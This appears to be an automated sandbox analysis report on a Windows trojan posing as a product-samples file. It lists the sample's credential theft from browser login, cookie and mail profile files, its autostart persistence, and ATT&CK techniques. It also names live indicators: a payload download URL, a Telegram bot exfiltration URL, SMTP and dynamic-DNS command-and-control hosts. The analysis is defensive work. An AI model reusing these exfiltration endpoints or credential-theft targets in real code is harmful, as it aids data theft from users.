                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeMemory allocated: page read and write | page guardJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeProcess created: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe "C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 0_2_00405B9E GetVersion,LdrInitializeThunk,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,0_2_00405B9E
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                Source: Yara matchFile source: 00000002.00000002.22140550905.0000000034921000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0f20.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344afd6e.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344b0c8e.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344afd6e.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.36a20000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344b0c8e.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.36a20000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0f20.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.22139880474.00000000346F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.17878640110.0000000004729000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.22139401502.000000003446F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.22149922122.0000000036A20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Drawing_Products_Materials_and_Samples_IMG.exe PID: 3392, type: MEMORYSTR
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe, File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: Yara match, File source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0f20.2.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344afd6e.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344b0c8e.0.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344afd6e.1.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.36a20000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344b0c8e.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.36a20000.4.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0000.3.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0f20.2.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 00000002.00000002.22139880474.00000000346F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000002.00000003.17878640110.0000000004729000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000002.00000002.22144177112.0000000035965000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000002.00000002.22140550905.00000000349E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000002.00000002.22139401502.000000003446F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000002.00000002.22149922122.0000000036A20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: Process Memory Space: Drawing_Products_Materials_and_Samples_IMG.exe PID: 3392, type: MEMORYSTR

                Remote Access Functionality

                Source: Yara match, File source: 00000002.00000002.22140550905.0000000034921000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0f20.2.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344afd6e.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344b0c8e.0.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344afd6e.1.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.36a20000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344b0c8e.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.36a20000.4.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0f20.2.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0000.3.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 00000002.00000002.22139880474.00000000346F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000002.00000003.17878640110.0000000004729000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000002.00000002.22139401502.000000003446F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000002.00000002.22149922122.0000000036A20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: Process Memory Space: Drawing_Products_Materials_and_Samples_IMG.exe PID: 3392, type: MEMORYSTR
                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | 1 OS Credential Dumping | 3 File and Directory Discovery | Remote Services | 11 Archive Collected Data | 1 Web Service | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
                Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 Registry Run Keys / Startup Folder | 11 Process Injection | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 115 System Information Discovery | Remote Desktop Protocol | 1 Data from Local System | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 Registry Run Keys / Startup Folder | 2 Obfuscated Files or Information | Security Account Manager | 21 Security Software Discovery | SMB/Windows Admin Shares | 1 Email Collection | 11 Encrypted Channel | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 DLL Side-Loading | NTDS | 131 Virtualization/Sandbox Evasion | Distributed Component Object Model | 1 Clipboard Data | 1 Non-Standard Port | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 11 Masquerading | LSA Secrets | 1 System Network Configuration Discovery | SSH | Keylogging | 3 Non-Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 131 Virtualization/Sandbox Evasion | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | 24 Application Layer Protocol | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 11 Process Injection | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Source | Detection | Scanner | Label | Link
                Drawing_Products_Materials_and_Samples_IMG.exe | 32% | ReversingLabs | Win32.Trojan.Guloader |
                Drawing_Products_Materials_and_Samples_IMG.exe | 100% | Joe Sandbox ML | |

                Source | Detection | Scanner | Label | Link
                C:\Users\user\AppData\Roaming\stub\Sophia.exe | 100% | Joe Sandbox ML | |
                C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dll | 0% | ReversingLabs | |
                C:\Users\user\AppData\Roaming\stub\Sophia.exe | 32% | ReversingLabs | Win32.Trojan.Guloader |
                No Antivirus matches
                No Antivirus matches
                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                smtp.zoho.eu | 185.230.214.164 | true | true | | unknown
                reallyfreegeoip.org | 172.67.177.134 | true | true | | unknown
                api.telegram.org | 149.154.167.220 | true | true | | unknown
                checkip.dyndns.com | 158.101.44.242 | true | false | | unknown
                checkip.dyndns.org | unknown | unknown | true | | unknown
                Name | Malicious | Antivirus Detection | Reputation
                https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:888683%0D%0ADate%20and%20Time:%2024/09/2024%20/%2010:31:19%0D%0ACountry%20Name:%20Czechia%0D%0A%5B%20888683%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | Avira URL Cloud: safe | unknown
                https://reallyfreegeoip.org/xml/79.127.132.20 | false | Avira URL Cloud: safe | unknown
                http://checkip.dyndns.org/ | false | Avira URL Cloud: safe | unknown
                http://64.188.18.75/ReySnONaTTPqhXrIqUlWWanbq212.bin | false | Avira URL Cloud: safe | unknown
                Name | Source | Malicious | Antivirus Detection | Reputation
                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035C52000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://checkip.dyndns.orgDrawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034A9B000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034921000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034AA6000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034A90000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://nsis.sf.net/NSIS_ErrorErrorDrawing_Products_Materials_and_Samples_IMG.exe, Sophia.exe.2.drfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://api.telegram.org/bot/sendMessage?chat_id=&text=Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034ABE000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.00000000349D1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.ecosia.org/newtab/Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035C52000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://cacerts.thawte.com/ThawteTLSRSACAG1.crt0Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22149615025.0000000036960000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22149615025.000000003697C000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22124915981.0000000004738000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034A4A000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.google.com/favicon.icoDrawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035C52000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://smtp.zoho.euDrawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.00000000349E6000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://aborters.duckdns.org:8081Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22139880474.00000000346F0000.00000004.08000000.00040000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000003.17878640110.0000000004729000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034921000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22139401502.000000003446F000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22149922122.0000000036A20000.00000004.08000000.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://ac.ecosia.org/autocomplete?q=Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035C52000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.google.com/chrome/GoogleDrawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035D94000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://nsis.sf.net/NSIS_ErrorDrawing_Products_Materials_and_Samples_IMG.exe, Sophia.exe.2.drfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.google.com/chromeDrawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035DB8000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035AC6000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.00000000349E6000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035E0D000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://51.38.247.67:8081/_send_.php?LDrawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.00000000349E6000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.google.com/search?q=backslash&sourceid=chrome&ie=UTF-8backslashDrawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035ABE000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://anotherarmy.dns.army:8081Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22139880474.00000000346F0000.00000004.08000000.00040000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000003.17878640110.0000000004729000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034921000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22139401502.000000003446F000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22149922122.0000000036A20000.00000004.08000000.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtdDrawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000001.17726016358.00000000005F2000.00000020.00000001.01000000.00000006.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://reallyfreegeoip.orgDrawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.000000003496A000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.google.com/search?q=backslash&sourceid=chrome&ie=UTF-8https://www.google.com/search?q=baDrawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035DB3000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035AC1000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035E04000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://reallyfreegeoip.org/xml/79.127.132.20$Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034A9B000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034AA6000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034A90000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://api.telegram.orgDrawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034ABE000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035C52000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.google.com/Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035DA2000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.00000000349E6000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035AB0000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035DE2000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://gemini.google.com/app?q=Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035C52000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedDrawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22139880474.00000000346F0000.00000004.08000000.00040000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000003.17878640110.0000000004729000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22139401502.000000003446F000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22149922122.0000000036A20000.00000004.08000000.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | true
185.230.214.164 | smtp.zoho.eu | Netherlands | 41913 | COMPUTERLINEComputerlineSchlierbachSwitzerlandCH | true
158.101.44.242 | checkip.dyndns.com | United States | 31898 | ORACLE-BMC-31898US | false
64.188.18.75 | unknown | United States | 8100 | ASN-QUADRANET-GLOBALUS | false
172.67.177.134 | reallyfreegeoip.org | United States | 13335 | CLOUDFLARENETUS | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1516835
Start date and time: 2024-09-24 16:27:38 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 17m 27s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2021, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name: Suspected Instruction Hammering
Number of analysed new started processes analysed: 10
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Drawing_Products_Materials_and_Samples_IMG.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@3/14@4/5
                          EGA Information:
                          • Successful, ratio: 50%
                          HCA Information:
                          • Successful, ratio: 97%
                          • Number of executed functions: 221
                          • Number of non-executed functions: 131
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                          • Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, backgroundTaskHost.exe
                          • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com, nexusrules.officeapps.live.com
                          • Execution Graph export aborted for target Drawing_Products_Materials_and_Samples_IMG.exe, PID 3392 because it is empty
                          • Report size exceeded maximum capacity and may have missing disassembly code.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                          • VT rate limit hit for: Drawing_Products_Materials_and_Samples_IMG.exe
Time | Type | Description
16:31:06 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce file C:\Users\user\AppData\Roaming\stub\Sophia.exe
16:31:14 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce file C:\Users\user\AppData\Roaming\stub\Sophia.exe
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          149.154.167.220Ziraat Bankas#U0131 Swift Mesaj#U0131_Report9278837374.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                            file.exeGet hashmaliciousLummaC, Clipboard Hijacker, Cryptbot, LummaC StealerBrowse
                              Inv_230924193849328483pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                JrBeso.exeGet hashmaliciousXWormBrowse
                                  SWIFT COPY.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                    lpg.cmdGet hashmaliciousXWormBrowse
                                      ha9wYxkNI7.lnkGet hashmaliciousXWormBrowse
                                        9KO1ScZ376.lnkGet hashmaliciousXWormBrowse
                                          dekont_20240918_38847738373.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            Richiesta di preventivo__DOULIK INDUSTRIES Co (PTE) Ltd___PDF.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              185.230.214.164CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeGet hashmaliciousGuLoaderBrowse
                                                CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                  Orden#46789_2024_Optoflux_mexico_sderlss.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                    Orden#46789_2024_Optoflux_mexico_sderls.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                      okPY77wv6E.exeGet hashmaliciousAgentTeslaBrowse
                                                        RFQ678903423_PROD_HASUE_de_Mexicso_MAT_MEX.exeGet hashmaliciousAgentTeslaBrowse
                                                          RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeGet hashmaliciousGuLoaderBrowse
                                                            RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeGet hashmaliciousAgentTeslaBrowse
                                                              INQUIRY#46789_MAY24_PLANEX_SERVICES_CONTRACTING_GOODS.exeGet hashmaliciousAgentTeslaBrowse
                                                                VBG dk Payment Receipt --doc87349281.batGet hashmaliciousRemcos, AgentTesla, DBatLoaderBrowse
                                                                  158.101.44.242Enquiry 88210103.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • checkip.dyndns.org/
                                                                  Items IMG16092024.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • checkip.dyndns.org/
                                                                  dekont_20240918_38847738373.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • checkip.dyndns.org/
                                                                  Arca Defense A.S_ sipari#U015fi UTR01072410 - Eu-CRSP0177462170924.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • checkip.dyndns.org/
                                                                  QUOTATION_SEPQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • checkip.dyndns.org/
                                                                  Bank Receipt Voucher.jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • checkip.dyndns.org/
                                                                  FACTURAS.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • checkip.dyndns.org/
                                                                  hsbc swift.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • checkip.dyndns.org/
                                                                  Quote RF-E68-STD-094.pdf.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • checkip.dyndns.org/
                                                                  new shipment details.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • checkip.dyndns.org/
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
